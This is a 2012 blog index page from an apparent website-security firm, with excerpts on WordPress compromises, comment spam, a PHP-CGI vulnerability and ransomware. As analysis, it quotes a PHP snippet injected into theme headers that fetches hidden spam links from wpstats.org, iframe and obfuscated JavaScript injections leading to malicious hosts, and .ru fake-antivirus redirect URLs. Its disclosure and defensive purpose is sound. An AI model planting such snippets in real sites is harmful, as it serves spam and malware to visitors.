Websites Compromised with Fake AV Campaign (Windows Web Secure Kit)

Posted on May 15, 2012 by Daniel Cid

“To help protect your computer, Windows Web Secure Kit have detected trojans and is ready to remove them”. We are seeing many WordPress sites compromised with a malware redirecting users to the “Windows Web Secure Kit” fake/rogue anti virus. So if you get that message when visiting your (or any site), you know that it is likely compromised by it.

What is going on?

Once a site gets compromised, the .htaccess file gets modified to redirect users running Windows and coming from search engines to some russian sites:

http://colceadem.ru/infinity?8 OR
http://ademcolce.ru/infinity?8 OR
http://tradeincas.ru/siga?7 OR many others

Which then redirects the user to some intermediate sites (also .ru):

Read more.


Posted in fakeav, htaccess, malware, malware_updates, wordpress | Tagged , , , , | Leave a comment

Official WordPress Plugin Directory – Forcing Plugin Updates

Posted on May 11, 2012 by Dre Armeda

For some while we have wondered what happens when a plugin is removed from the official WordPress plugin directory for security reasons. Historically, we haven’t seen much of anything happen – no notification to users, no official blog post, nothing beyond the plugin disappearing from the repo. Sometimes when it did disappear, my understanding is updates were forced – certainly for the major vulnerabilities.

In an interesting move, it looks like some experimental changes have been made to help ensure users quickly learn there is a security problem.
Read more.


Posted in community, plugin, security, sucuri, updates, vulnerability, wordpress | Tagged , , , , , | 4 Comments

Blog Comments – Analysing 100,000 Comments and Spammers

Posted on May 11, 2012 by Daniel Cid

“Nice blog, thanks for the info”

“Awesome site. Great job”

“You should take part in a contest for one of the best blogs on the web. I will recommend this site!”

I know you like flattering comments on your website. And I know you love to see many comments on each one of your posts (say you community participation). Who doesn’t, right? We love them too.

So we decided to take a closer look at the last 100,000 (well, 98,238 to be more exact) comments that were sent to the network of sites that we are monitoring. How much of them are spam? Who are the most annoying spammers? And things like that.

Read more.


Posted in comment, data, spam, webinar | Tagged , , , | 8 Comments

Wpstats. org Spam and a Fake Advanced Search Plugin

Posted on May 9, 2012 by Daniel Cid

If you are seeing hidden links in your WordPress site, it could be coming from wpstats.org. On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site:

if(function_exists(‘curl_init’)) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data”; }

If you are not familiar with PHP, this code will contact www.wpstats.org/jquery-1.6.3.min.js, which will return a long list of hidden links to be included on your site (not visible on a normal browser).
Read more.


Posted in hacked, malware, malware_updates, pharma, spam | Tagged , , , , | 5 Comments

Sucuri WordPress Security Plugin Protects Against PHP-CGI Vulnerability

Posted on May 8, 2012 by Tony Perez

Today we released an update on the latest PHP CGI vulnerability and provided some additional information that users can use to help protect against it.

Guidance includes updating your .htaccess file with the following:

RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? – [F,L]

It is important to note however that if you are on WordPress and currently using our Free security plugin you are protected. We are actively seeing the attack across our growing network of plugin users and proactively pushing changes to protect our users. Read more.


Posted in awareness, plugin, protection, security, sucuri, wordpress | Tagged , , , | 2 Comments

PHP-CGI Vulnerability Exploited in the Wild

Posted on May 8, 2012 by Daniel Cid

When the PHP-CGI vulnerability was disclosed, we knew it would be just a matter of days before it started to be exploited in the wild.

Well, it didn’t take long. Since the weekend, we started to see scanners looking for that vulnerability on our servers and honeypots. And now we are seeing sites getting compromised through it as well.

Understanding the Attack

So far we noticed that the attack starts in two ways, either by checking if the server is vulnerable using the ?-s option (which shows the source of the page):
Read more.


Posted in malware, malware_updates, vulnerability | Tagged , , , , | 10 Comments

April/2012 Malware Analysis

Posted on May 1, 2012 by Daniel Cid

When we see a compromised site distributing malware, it is often done via 4 methods: Iframe, Javascript, Spam or internal redirections. Those are not the only ways, and they can be encoded or hidden differently internally on the sites, but the final output on the compromised sites is generally one of them:

  1. Iframe injection: It makes the browser loads content from external (and malicious web sites). Example: <iframe src="http://pokosa.com/tds/go.php?sid=1" ..
  2. Javascript injection: Used to encode (hide) calls to iframes or additional remote javascript includes. Example: <script>d= Date ;d=new d();h=-parseInt("012")/5;if(window.document)try{new document.getElementById(“qwe”)…. (this code redirects users to the blackhole exploit kit)
  3. .htaccess (or conditional) redirections: Used to redirect anyone visiting the site from search engines (or specific user agents/ referers) to malware or spam content.
  4. Blackhat SEO spam: It is not really malware in the sense of the word (since it won’t infect anyone visiting the site), but it is still harmful for the webmaster and the site’s reputation (imagine a corporate site redirecting to a viagra  online  store).

April / 2012 stats

Read more.


Posted in data, malware, malware_updates, sucuri | Tagged , , , | 5 Comments

New WooThemes Vulnerability Patched – Update Framework Now!

Posted on April 29, 2012 by Tony Perez

Yesterday a vulnerability on the WooThemes Framework was disclosed by Jason Gill on githumb:gist. The vulnerability allows a visitor to see and run the output of any shortcode configured on the WordPress site.

At this time this does not appear to be linked to the DDoS they experienced this week.

We are currently assessing the severity of this vulnerability in our labs. If in fact we find that something severely adverse can be performed with it, the next big concern will be that it can be exploited even if the theme is not active. Read more.


Posted in awareness, community, sucuri, vulnerability | Tagged , , , | 6 Comments

Ransomware Malware on the Web?

Posted on April 28, 2012 by Tony Perez

As the week comes to a close I wanted to take a minute to talk about something we haven’t yet – Ransomware Malware.

The idea came from a case this week where a client was defaced. Instead of engaging the host or malware professional she took it upon herself to to plead with the attacker via the provided email (you have to love egos). What was most amusing though was the attacker finally gave in and restored her site in an attempt to get her off his back.

Obviously not something we recommend, but an amusing story none the less. She turned his defacement and retaliated with a little something we like to call, “Begware.”

And so this got us thinking about something that has predominantly been isolated to the notebook and desktop environments – Ransomware malware. Read more.


Posted in awareness, community, malware, security, sucuri | Tagged , , , , | 3 Comments

Lockdown WordPress – A Security Webinar with Dre Armeda

Posted on April 26, 2012 by Dre Armeda

We had the opportunity to do a webinar about WordPress security with the guys from iThemes yesterday. Here’s the video for those of you who missed out on the fun:

Dre Armeda from Sucuri Security presented on various WordPress related areas that help reduce risk for website owners and administrators. The webinar includes a high level discussion about the growth of the internet, he goes over some of the more popular malware attacks affecting WordPress users, then offers various tips, tools, and resources to help you reduce risk.

Hope you enjoy!

If you have any questions, feel free to email us at info@sucuri.net


Posted in awareness, education, sucuri, webinar, wordpress | Tagged , , , , , | 4 Comments
RSS Delicious